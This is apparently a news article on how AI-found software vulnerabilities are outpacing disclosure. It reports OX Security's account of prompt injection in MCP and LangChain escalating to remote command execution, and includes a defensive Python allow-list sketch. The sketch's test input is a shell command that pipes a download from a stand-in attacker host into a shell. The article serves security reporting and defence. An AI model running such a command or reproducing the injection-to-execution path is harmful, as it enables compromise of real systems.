AI systems designed to discover software flaws at scale are beginning to outpace the classification and disclosure of vulnerabilities. New research and early data from the Mythos program have highlighted gaps in how findings are reported, attributed, and tracked.

Key takeaways:

OX Security found that serious flaws in AI frameworks like Anthropic’s MCP are often dismissed as “expected behavior,” even when they enable major risks like remote code execution.
Johns Hopkins research shows AI tools are finding bugs faster than humans can verify them, with companies sometimes acknowledging issues privately (and paying bounties) without public disclosure.
Early Mythos data and CVE analysis suggest many AI-discovered vulnerabilities aren’t being formally tracked, highlighting gaps in disclosure systems and calls for dedicated reporting channels.

As Anthropic promotes its Mythos model as capable of autonomously discovering software vulnerabilities at scale – and OpenAI is reported to be developing similar systems – new research suggests the challenge may not be finding flaws but handling them once they are identified.

Three reports published this week (two of which were undertaken before the Mythos announcement) point to a widening gap between AI-driven bug hunting and the way the resulting flaws are reported.

Anthropic’s MCP agent framework: Flaw or expected behavior?

An OX Security report focuses on Anthropic’s Model Context Protocol (MCP), a framework that enables AI agents to interact with external tools and services.

Researchers Moshe Ben Siman Tov, Mustafa Naamnih, Nir Zadok and Roni Bar examined Anthropic MCP implementations as well as comparable tool-connection frameworks used elsewhere in the ecosystem.

These included components associated with LangChain, a widely used open-source framework for building AI applications and agents that connect LLMs to APIs and external data sources.

According to the researchers, the core issue is that these frameworks can lead to prompt injection and agent hijacking, meaning that AI tools may treat malicious input as commands.

“The vulnerability is not a one-off coding mistake,” the report notes.

“It is an architectural design decision baked into Anthropic’s MCP code across supported programming languages.”

The report describes how prompt injection can escalate into system-level compromise, including remote command execution and access to sensitive data.

OX said it was able to demonstrate arbitrary command execution across six live production platforms serving paying customers (it did not name which ones), suggesting the issue extended beyond lab conditions.

The problem, researchers claim, arose from the reporting of this flaw: when it was disclosed to Anthropic and LangChain, both classified it as “expected behavior.”

The report claims, “LangChain’s response was: ‘This is expected behavior. Developers are responsible for their own sanitization.’”

The distinction between “expected behavior” and a vulnerability matters because an issue classified as expected behavior may never enter formal disclosure pipelines such as advisories or CVE reporting.

However, OX argues that when expected behavior leads to remote code execution (RCE), it should be treated as a vulnerability.

OX claims that this is a “widespread problem” across multiple projects that connect user input to MCP configuration.
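
To make the risk concrete: MCP servers that run as local processes are commonly described by a command and a list of arguments, so any path that lets user input shape that configuration can decide what gets executed. The sketch below is not OX's proof of concept and not part of any Anthropic or LangChain SDK. It is a minimal illustration of one possible mitigation, in which user input can only select a server by name from a fixed registry. The names `StdioServerConfig`, `APPROVED_SERVERS`, `resolve_server` and the `example-*` commands are all hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class StdioServerConfig:
    """Illustrative stand-in for a local server entry: a command plus its arguments."""
    command: str
    args: tuple[str, ...] = ()


# Hypothetical registry, maintained by the operator and never built from user input.
APPROVED_SERVERS = {
    "docs": StdioServerConfig("example-docs-server", ("--read-only",)),
    "tickets": StdioServerConfig("example-tickets-server"),
}


def resolve_server(user_choice: object) -> StdioServerConfig:
    """Map untrusted input to a pre-approved config, or refuse.

    The risky pattern would be copying a user-supplied "command" or "args"
    value straight into the configuration that is later used to start a process.
    Here the user can only pick a key; the command itself is fixed by the operator.
    """
    if not isinstance(user_choice, str) or user_choice not in APPROVED_SERVERS:
        raise ValueError(f"unknown server: {user_choice!r}")
    return APPROVED_SERVERS[user_choice]


if __name__ == "__main__":
    print(resolve_server("docs"))
    try:
        resolve_server("sh -c 'curl attacker.example | sh'")
    except ValueError as err:
        print("rejected:", err)
```

A registry like this only narrows one input path. It does not address prompt injection arriving through tool output or other channels, which is part of why OX argues the fix belongs in the framework rather than with each implementer.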

“We repeatedly tried to convince Anthropic to patch their code in ways that would instantly protect millions of users. They declined each time.”
OX Security

They claim that Anthropic must have known because, a week after they contacted the Claude AI maker, it released an updated security policy stating that MCP adapters should be used with caution.

“This change didn’t fix anything – it just made it clearer that Anthropic's stance is on letting developers secure their own code instead of securing their infrastructure,” the researchers said.

However, as the researchers point out, developers are not security engineers.

“Developers are not security engineers; we cannot expect tens of thousands of implementers to independently discover and mitigate a flaw that is baked into the official SDKs they trust.”
OX Security

The researchers also point out that, as less technically proficient users vibe code, they will simply be unable to mitigate what they describe as a secure-by-design failure.

Johns Hopkins: AI-powered coding is surfacing bugs faster than the reviewers can verify

At the same time, separate research led by Aonan Guan, with academics from Johns Hopkins University, shows a related pressure point: AI tools are finding vulnerabilities faster than human teams can review or verify them.

Although this research was published today, it would have predated the release of Mythos. The study of agentic coding assistants found widespread prompt-injection and tool-use weaknesses, while broader reviews concluded that many defenses remain incomplete or inconsistent across platforms.

Researchers say that means AI may accelerate discovery, but human teams still face the slower task of validation, prioritization, patching, and formal disclosure.

Interestingly, while Anthropic, GitHub and others acknowledged the vulnerabilities and paid bug bounties, they did so quietly and did not publicly disclose the issues. GitHub initially dismissed Guan's research as a known "architectural limitation" before paying him $500 and patting him on the back. "Your report sparked some great internal discussions," it added.

Project Glasswing early data: the difficulty of tracking results

An early look at data on Mythos’s own output suggests that even clearly defined vulnerabilities may not be fully reflected in public reporting systems.

Anthropic has made Mythos available through Project Glasswing, a restricted program allowing selected organizations – banks, big tech, and cybersecurity heavyweights – to test the model on their own software.

An analysis published in The Register highlights the difficulty of tracking the results. VulnCheck researcher Patrick Garrity reviewed CVE records to identify vulnerabilities linked to Anthropic’s work and found only a limited number of entries that could plausibly be connected to Mythos or Glasswing activity.

Garrity found around 75 CVE records containing references to Anthropic, but many related to Anthropic products such as Claude Code or third-party integrations rather than vulnerabilities discovered by Mythos.

Of the remaining entries credited to Anthropic or affiliated researchers, only one publicly disclosed issue – a remote code execution flaw in FreeBSD – could be directly tied to claims that Anthropic has made about Mythos.

Other vulnerabilities publicly referenced by Anthropic, including legacy bugs in operating systems and software libraries, had not yet been assigned CVEs at the time of the analysis.

Garrity added that “the full picture won’t be known until public disclosure takes place,” and suggested a dedicated advisory channel where Anthropic could consistently publish findings, remediation status, and attribution.

Disclosure pipelines under pressure

Ilkka Turunen, field CTO at Sonatype, said Mythos points to a near-term surge in AI-driven vulnerability discovery that existing reporting systems may struggle to absorb. He noted that the US National Vulnerability Database has already changed how it processes submissions, prioritizing software used by the federal government and actively exploited flaws first – a sign that disclosure pipelines are under growing pressure.

As it stands, the CVE program counts more than 300,000 unique CVE records to date. Of those, around 18,000 were reported so far in 2026, an increase of more than 25% over the same period in 2025.
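
The growth figure can be sanity-checked with simple arithmetic. Taking the rounded numbers quoted above at face value, growth of more than 25% to roughly 18,000 records implies that the comparable 2025 count was at most about 14,400. The helper name `implied_baseline` is hypothetical, and the result is only as precise as the approximate inputs.

```python
def implied_baseline(current: float, growth: float) -> float:
    """Prior-period count implied by a current count and a fractional growth rate."""
    return current / (1.0 + growth)


records_2026 = 18_000  # approximate figure quoted in the article
min_growth = 0.25      # "more than 25%", so this gives an upper bound on the baseline

upper_bound_2025 = implied_baseline(records_2026, min_growth)
print(round(upper_bound_2025))  # 14400
```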

“We’re facing a double whammy – new vulnerabilities and poorer discoverability.”
Ilkka Turunen, field CTO at Sonatype

While these discoveries will not draw as many headlines as the limited release of a super-powerful AI that is considered too dangerous to be released, the question of how the vulnerabilities it surfaces will be categorized, prioritized, and communicated at scale is left hanging in the air like an unresolved flaw – visible to many, but owned by no one.